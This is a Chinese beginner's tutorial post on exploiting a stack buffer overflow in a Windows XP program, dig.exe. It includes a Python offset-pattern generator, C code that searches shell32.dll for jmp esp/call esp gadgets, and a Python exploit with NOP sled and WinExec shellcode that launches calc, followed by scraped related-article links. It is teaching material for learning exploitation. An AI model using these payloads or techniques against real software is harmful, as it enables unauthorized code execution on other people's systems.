shellcode 初次使用笔记
- winXP SP3 环境 (xp环境默认没开启栈不可执行机制,比较方便破解,如果已开启了,请自行百度如何关闭)
- dig.exe 目标文件
- x86dbg调试工具
- python 环境
打开准备好的目标软件 dig.exe
映入眼帘的有两个输入框,可以直接从键盘获取输入
第一个输入框应该是输入域名的,TCP lookup按钮查询此域名的各种信息
猜想,这个输入框1 中输入的文本可能保存在栈区中的临时变量里,毕竟域名都不太长
直接在输入框里输入1100个 'A' 然后点击 TCP lookup 看看有什么现象
哈哈,软件崩溃退出了!!
使用x86dbg 加载运行 dig.exe ,再输入1100个有序字符
CH=65
ch=97
num_1=48 buf=''
n_C=0
n_c=0
n_1=0 for i in range(1100//3):
if n_1>9:
n_c+=1
n_1=0
if n_c > 25:
n_C+=1
n_c=0
buf += chr(CH+n_C)+chr(ch+n_c)+chr(num_1+n_1)
n_1+=1 print(buf)
把生成的字符串复制到输入框1 中,看看崩溃点在哪
这个eip是什么?肯定是我们输入的字符串的ASCII码
int main()
{
char str[10] = { 0 };
scanf_s("%x", (int)str);//输入eip的值
puts(str);
}
哦,原来是'h2Bh'啊
在python 生成的字符串中找到'h2Bh'的位置
buf.find('h2Bh')
997,输入997个字符后字符串将覆盖eip
测试,运行计算器(当然你也可以是运行其他)
找到自己电脑中 WinExeC 函数的地址(方法自行百度)如果嫌麻烦,你可以自己写一个带有winexec函数的测试程序,用od看winexec函数的地址
找到程序中 jmp esp 或 call esp的指令
可以使用OllyUni.dll 这个OD插件寻找,不过寻找过程太慢,在我的测试中竟然运行了足足5分钟......这种时长不能忍!!!!
#include <windows.h>
#include <stdio.h>
#define DLL_NAME L"shell32.dll"
int main()
{
HINSTANCE handle = LoadLibrary(DLL_NAME);
if (!handle)
{
printf(" load dll erro !");
exit(0);
}
int address;
BYTE* ptr = (BYTE*)handle;
FILE *fp = fopen("shell32.txt", "w+");
fprintf(fp, "shell32.dll\t语句\t\t地址\t\t偏移\t\t基地址\n");
for (int position = 0; position < 12*1024*1024; position++)
{
if (ptr[position] == 0xFF)
{
if (ptr[position + 1] == 0xE4)
{
int address = (int)ptr + position;
fprintf(fp, "shell32.dll <jmp esp>\t%#x\t%#-8x\t%#x\n", address, position, ptr);
}
else if (ptr[position + 1] == 0xD4) //jmp esp
{
int address = (int)ptr + position;
fprintf(fp, "shell32.dll <call esp>\t%#x\t%#-8x\t%#x\n", address, position, ptr);
}
else{}
}
} fclose(fp);
return 0;
}
自己写个程序找shell32.dll中的指令
在eip后写程序,并且让他执行
# -*- coding: UTF-8 -*-
#我的电脑中 7C86250D kernel32.WinExec
import struct
junk = "A" * 997 #偏移 eip = '\x73\x15\xbf\x7d' #shell32.dll <call esp> 0x7dbf1573 nops = "\x90" * 10 #10字节NOP
fill = "\x43" * 10 #无用指令,测试时主要用于让自己看清shellcode结束了 #shellcode 要执行的代码
shellcode = "\x31\xC9" # xor ecx,ecx
shellcode += "\x51" # push ecx
shellcode += "\x68\x63\x61\x6C\x63" # push 0x636c6163
shellcode += "\x54" # push dword ptr esp
shellcode += "\xBB\x0D\x25\x86\x7C" # mov ebx,7C86250D
shellcode += "\xFF\xD3" # call ebx
#payload
payload = junk + eip + nops + shellcode+fill
#将payload写入到文件payload.txt
fp = open("payload.txt","w")
fp.write(payload)
fp.close()
print "[+]Exploit successfully!"
把生成的文件内容复制到 输入框1 中,是不是程序退出了,但计算器成功运行了?
或许这一步你成功了,但我还没有,为什么呢????因为系统原因,winexec函数的地址在我们的电脑中的位置是不一样的
#我的电脑中 7C86250D kernel32.WinExec
看没看到这个 7C86250D 中的 0D ?这是不会被输入到输入框的,输入框里并不是什么字符都可以被输入的,怎么办呢?这可是我电脑中winexec的地址啊!!!!
请注意 技术性的时刻即将到来了...
在x86dbg中直接输入 call 7C86250D 你会发现,咦?这机器码怎么与我输入的不一样呢?
因为人家使用的是相对 winexec 函数的地址
那么把自己的shellcode中也改成这样的地址不就好了!!
#shellcode 要执行的代码
shellcode = "\x31\xC9" # xor ecx,ecx
shellcode += "\x51" # push ecx
shellcode += "\x68\x63\x61\x6C\x63" # push 0x636c6163
shellcode += "\x54" # push dword ptr esp
shellcode += "\xe8\xd8\x25\xb1\x7b" #call winexec 这里啊,相对地址
'''
shellcode += "\xBB\x0D\x25\x86\x7C" # mov ebx,7C86250D
shellcode += "\xFF\xD3" # call ebx
'''
OMG,成功了!!
你可能会遇到的问题
- 你可能自己找 jmp esp 时的地址无法写入到 eip 中,要么是少了两位,要么是多了两们,不要气馁,你找到的地址不止一个 而是好几百个,可能这个地址中刚好有输入框中不可输入的字符,换个地址试试,如果不行,就再换
- 或许你在一开始就遇到的问题,复制的与字符串大部分都与 shellcode中的不一样,别着急,你试试把生成的字符串文件用 notpad++ 打开,或者 UltarEdit 会更好一些
- 遇到百度无法解决的问题,你还有最后两种强大的依靠,就是你的智慧与坚持
我是新手,如果文中有错误,请批评或指正,谢谢
shellcode 初次使用笔记的更多相关文章
- DataTable初次使用笔记
概述:DataTable是一个jQuery插件,用于生成HTML表格,功能很强大. 使用: 使用DataTable需要引入jQuery,因为他是基于jQuery的插件,然后引入DataTable的js ...
- 20145330《Java学习笔记》第一章课后练习8知识总结以及IDEA初次尝试
20145330<Java学习笔记>第一章课后练习8知识总结以及IDEA初次尝试 题目: 如果C:\workspace\Hello\src中有Main.java如下: package cc ...
- KTHREAD 线程调度 SDT TEB SEH shellcode中DLL模块机制动态获取 《寒江独钓》内核学习笔记(5)
目录 . 相关阅读材料 . <加密与解密3> . [经典文章翻译]A_Crash_Course_on_the_Depths_of_Win32_Structured_Exception_Ha ...
- Spring Cloud学习笔记--Spring Boot初次搭建
1. Spring Boot简介 初次接触Spring的时候,我感觉这是一个很难接触的框架,因为其庞杂的配置文件,我最不喜欢的就是xml文件,这种文件的可读性很不好.所以很久以来我的Spring学习都 ...
- Django笔记-MySQL初次使用设置
以下为个人学习时的笔记,正在完善中........... [1]启动服务 [root@bogon /]# service mysqld start正在启动 mysqld: [确定] [root@bog ...
- 初次使用InstallShield笔记
公司的产品需要打包发布,以前一直没打包,打包方法的学习交给了我 下面的内容是我研究过后的,通过回忆写的笔记.由于不熟悉,可能会有错误或者是笨办法,希望高手指正,感激不尽. 有些东西是什么,以及是什么意 ...
- 初次使用Docker的体验笔记
一.前言 Docker容器已经发布许久,但作为一名程序员如今才开始接触,实在是罪过-- 在此之前,我还没有对Docker进行过深入的了解,对它的认识仍停留在:这是一种新型的虚拟机.这样的 ...
- Hibernate笔记——Hibernate介绍和初次环境配置
Hibernate简介 Hibernate是一个开放源代码的对象关系映射框架,它对JDBC进行了非常轻量级的对象封装,使得Java程序员可以随心所欲的使用对象编程思维来操纵数据库. Hibernate ...
- Struts2笔记——初次框架配置
1.Struts2简介 Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架.其全新的Struts 2的体系结构与S ...
随机推荐
- C# 引用的程序集没有强名称
首先查一下什么是强名称程序集,见百度百科帖子:http://baike.baidu.com/view/1145682.htm简单来说,就是为了解决Windows Dll Hell问题的,即不同公司开发 ...
- Centos 6.5-yum安装出现错误解决方案
最近在用Centos 6.5 的时候出现了以下情况: 遇到这种问题试试以下方法: 1.检查是否能上网:ping www.baidu.com 如果显示没有连接的话,就说明没网,也就无法使用yum 命令安 ...
- mySQL 约束 (Constraints):一、非空约束 NOT NULL 约束
非空约束 NOT NULL 约束: 强制列不能为 NULL 值,约束强制字段始终包含值.这意味着,如果不向字段添加值,就无法插入新记录或者更新记录. 1.在 "Persons" 表 ...
- PHP类继承、接口继承关系概述
PHP类继承: PHP类不支持多继承,也就是子类只能继承一个父类,但是支持多层次继承,比如: class frist{ public function __construct(){ echo &quo ...
- Centos7源码安装httpd2.4版本web服务器
我们的系统平台是在centos7.5的环境下安装httpd2.4版本的软件,2.4版本的软件有一个特征就是需要安装arp包以及arp-util包才可以. 1.首先是下载httpd2.4版本的包,以及安 ...
- arcgis pro2.3教程与问题集持续更新(一)
Arcgis pro 2.3是64位的不支持mdb 数据库,因为微软没有开放Access64的接口,所以不能支持个人地理数据库.mdb(Microsoft Database). arcgis pro ...
- mysql 错误2203 1061 及安装最后出现2003现象的解决办法
错误描述 : 1.#2003-服务器没有响应MySQL无法启动 2.Can''t connect to MySQL server on ''localhost'' (10061) 3.ERROR 20 ...
- BZOJ3251:树上三角形(乱搞)
Description 给定一大小为n的有点权树,每次询问一对点(u,v),问是否能在u到v的简单路径上取三个点权,以这三个权值为边长构成一个三角形.同时还支持单点修改. Input 第一行两个整数n ...
- PHP错误提示的关闭方法详解
关闭PHP错误脚本提示是程序上线了必须做的一件事情,就是不管程序怎么报错我们都不能让错误日志在服务器上给大家看到,下面我来总结两种关闭PHP错误脚本提示的具体方法 最简单的办法就是直接在php ...
- PHP实现微信发红包功能2
<?php class wxPay { //配置参数信息 const SHANGHUHAO = "1430998xxx";//商户号 const PARTNERKEY = & ...